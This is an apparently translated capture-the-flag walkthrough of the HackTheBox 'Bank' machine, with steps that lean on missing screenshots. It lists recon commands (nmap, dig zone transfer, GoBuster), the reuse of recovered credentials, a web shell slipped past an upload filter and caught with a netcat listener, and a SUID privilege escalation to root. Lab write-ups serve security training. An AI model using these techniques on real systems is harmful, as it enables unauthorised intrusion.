HackTheBox is a platform for information security professionals to test their skills, which includes very realistic tasks such as hacking a bank.
( only txt inf )
Nmap result:
nmap -sV -sT -O -A -p- 10.10.10.29
We see open ports 53 and 80.
Digging into DNS:
dig axfr @10.10.10.29 bank.htb
Editing the hosts file to add what we found:
cat etc/hosts
Checking the web page by IP:
Using the domain, we find the login page:
We try entering random data to see how the site behaves
We run GoBuster and find the server's directories:
gobuster dir -u ... -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -s '200,204,301,302,307,403,500' -e
We go to the directory through the browser
We use the wget -r command to download all files to a folder, sort them by size, and find the following
After opening this file, we get the login credentials
We enter these credentials on the login page
We check the support and find a place to upload files:
We can only upload files with image extensions:
Through Burp, we check if we can interfere with mail requests and find this:
We copy our shell into something with the .htb extension:
With our handler set up, we view the shell and get execution:
nc -lvp 443
We get the users.txt file:
We search for binary files:
find / -perm -4000 2>/dev/null
We execute /var/htb/bin/emergency and get root:
We check the system users:
ls -al /etc/passwd
We have the ability to create other accounts.
